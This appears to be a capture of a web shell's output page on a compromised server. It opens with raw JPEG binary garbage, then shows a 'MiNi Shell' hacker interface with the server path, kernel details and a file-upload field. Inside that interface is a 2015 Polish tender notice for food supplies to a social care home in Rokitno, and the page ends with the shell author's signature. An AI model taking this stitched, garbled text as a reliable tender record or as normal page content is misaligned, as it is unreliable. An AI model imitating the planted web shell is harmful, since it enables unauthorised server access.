JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151119/311870-N-2015.html

<p class="kh_header"><b>Przytoczna: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH NA 2016 ROK</b><br>
<b>Numer ogłoszenia: 311870 - 2015; data zamieszczenia: 19.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Rokitno 58, 66-340 Przytoczna, woj. lubuskie, tel. 0-95 7493024, 7494032, faks 0-95 7493024.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzyrzecz.dps5.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH NA 2016 ROK.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A  - żywność, napoje i art. mleczarskie - kod CPV 15000000-8
Nazwa	Jednost. miary	Planowana wielkość zamówienia

Ogórek konserwowy - 0,9 l	szt.	360
Koncentrat pomidorowy - 0,9 kg	szt.	320
Groch - 1 kg	kg	100
Groszek konserwowy - 400 g	szt.	240
Fasola - 1 kg	kg	130
Fasolka szparagowa konserwowa - 700 g	szt.	160
Marchew konserwowa - 700 g	szt.	240
Ćwikła - 280 g	szt.	260
Ketchup ostry / łagodny - 500 g	szt.	50/50
Majonez - 700 g	szt.	150
Musztarda - 200 g	szt.	290
Kapusta konserwowa czerwona - 0,9 l	szt.	300
Sałatka wielowarzywna - 0,9 l	szt.	350
Koncentrat szczawiowy - 300 g	szt.	100
Ogórek kwaszony - 0,9 l	szt.	420
Kapusta kwaszona - 0,9 l	szt	350
Pasztet drobiowy - 500 g	szt.	300
Konserwa mięsna - 300 g	szt.	500
Konserwa rybna w pomidor  - 250 g	szt.	600
Paprykarz szczeciński - 330 g	szt.	350
Cukier - 1 kg	kg	1600
Kasza jęczmięnna - 1 kg	kg	350
Kasza manna - 1,0 kg	kg	170
Ryż - 1 kg	kg	550
Płatki owsiane - 0,5 kg	kg	140
Płatki kukurydziane - 250 g	szt.	300
Mąka wrocławska - 1 kg	kg	960
Mąka ziemniaczana - 1 kg	kg	20
Olej - 1 l	l	400
Żurek - 1 kg	kg	60
Sól - 1 kg	kg	400
Makaron  -  nitki,świderki- ilość w kg 	kg	120/650
Bułka tarta - 0,5 kg	kg	230
Galaretka owocowa - 90 g	szt	1500
Kisiel - 40 g	szt	1300
Budyń - 40 g	szt.	230
Kompoty - 0,9 l	szt.	100
Kawa Inka - 150 g	szt	1000
Herbata - 100 g	kg	50
Ocet - 0,5 l	szt.	100
Pieprz naturalny mielony 20 g	szt	500
Pieprz ziołowy - 15 g	szt	320
Przyprawa do zup w płynie - 1 l	l	50
Majeranek 100 g	szt	80
Zaprawa do napojów, różne smaki - 0,5 litra	szt	540
Przyprawa do zup w proszku - 0,2 kg	szt	380
Papryka słodka mielona - 20 g	szt	260
Czosnek mielony - 20 g	szt	200
Kakao - 200 g	szt	250
Herbata owocowa ekspresowa - 2 g x 20 szt.	szt	800
Sos pieczeniowy - 30 g	szt	100
Zupa ogonowa - 1 kg	kg	50
Rosół z kury - 170 g	szt	120
Zupa pieczarkowa - 1 kg	kg	40
kukurydza konserwowa - 400 g	szt.	180
Miód naturalny - 370g	szt	20
Cynamon - 20g	szt	50
Kwasek cytrynowy - 20 g	szt	70
Chrzan konserwowy tarty - 270 g	szt	70
Liść laurowy - 10 g	szt	30
Ser tylżycki twardy	kg	280
Ser topiony	kg	120 kg
Mleko w proszku pełnotłuste 	kg	1200 
Masło extra nie mniej  niż 82 % tłuszczu	kg	990
Margaryna - 0,25 kg	kg	120 
Masło roślinne - 0,5 kg	kg	120
Śmietana 18% - 0,4 l	l	650
Twaróg półtłusty - ilość w kg	kg	400
Jogurt owocowy - 115 g	szt.	4200
Jogurt naturalny - 150 g	szt	300
Kefir naturalny - 400 g	szt.	420
Cukier waniliowy- 30 g	szt.	80
Proszek do pieczenia - 40 g	szt.	50
Cukier puder - 500 g	szt.	15
Dżem  / różne smaki /- 580 g	szt.	350
Fasolka czerwona konserwowa - 400 g	szt	90
Ananas w kawałkach  puszka  - 580 g	szt	40
Soda oczyszczona - 30 g	szt	30
Przecier ogórkowy - 0,9 l	szt	90
Kasz jaglana - 1 kg	kg	20
Mleko 3,2 %  karton  - 1 l	l	20
Klopsy w sosie pomidorowym - 500 g	szt	90
Żelatyna spożywcza wieprzowa - 50 g	szt	50

Część B  - mięso, wędliny, drób - kod CPV 15100000-9; 15112100-7
Nazwa	Jedn. miary	Planowana wielkość zamówienia
Karkówka wieprzowa bez kości	kg	350
Schab wieprzowy bez kości	kg	300 
Schab wieprzowy z kością	kg	250
Mięso mielone wieprzowe	kg	250
Mięso gulaszowe wieprzowe	kg	400
Kiełbasa mortadela	kg	200
Kiełbasa biała parzona	kg	160
Kiełbasa Piwna 	kg	100
Kiełbasa szynkowa	kg	140
Kiełbasa żywiecka	kg	90
Kiełbasa zwyczajna	kg	330
Kiełbasa śląska	kg	260
Kiełbasa parówkowa	kg	330
Wątrobianka	kg	150
Salceson biały	kg	150
Metka cebulowa	kg	150
Łopatka faszerowana	kg	150
Kaszanka	kg	240
Pieczeń rzymska	kg	170
Boczek faszerowany	kg	100
Żeberka wieprzowe	kg	240
Szynka gotowana wędzona	kg	110
Smalec -0,2 kg	kg	80
Boczek wędzony parzony	kg	30 
Kurczak świeży	kg	240
Udko z kurczaka	kg	440
Porcje rosołowe	kg	630
Wątróbka drobiowa	kg	180
Kiełbasa tyrolska	kg	60
Polędwica sopocka	kg	30
Kiełbasa mielonka	kg	140
Filet drobiowy	kg	30
Polędwica drobiowa	kg	15
Golonka wieprzowa gotowana	kg	60

Część C - pieczywo - kod CPV 15810000-9
Nazwa	Jedn. miary	Planowana wielkość zamówienia
Chleb baltonowski - 1 kg	szt.	6.900 szt.
Chleb razowy - 1 kg	szt.	1.400 szt. 
Bułka wrocławska - 0,10 kg	szt.	19.360 szt.

Część D - ryba - kod CPV 15220000-6; mrożonki - kod CPV 15331170-9
Nazwa	Jedn. miary	Planowana wielkość zamówienia
śledź matyjas	kg	200
Makrela wędzona	kg	230
Filety z PANGI     - mrożony                	kg	400
Burger rybny z warzywami - mrożone	kg	180
Pierogi z mięsem - mrożone	kg	120
Pierogi ruskie  - mrożone    	kg	240
Flaki wieprzowe - mrożone	kg	240
Zupa wiosenna - mrożona	kg	140
Włoszczyzna paski - mrożona	kg	740
Brokuł mrożony	kg	80
Pyzy mrożone	kg	120
Kalafior mrożony	kg	40.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.81.00.00-9, 15.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie - spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie - spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie - spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie - spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie - spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miedzyrzecz.dps5.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
Rokitno Nr 58   66 - 340 Przytoczna  
tel. / fax 095 / 7493024 lub 095/7943032.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2015 godzina 10:00, miejsce: Sekretariat Domu Pomocy Społecznej
Rokitno Nr 58   66 - 340 Przytoczna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com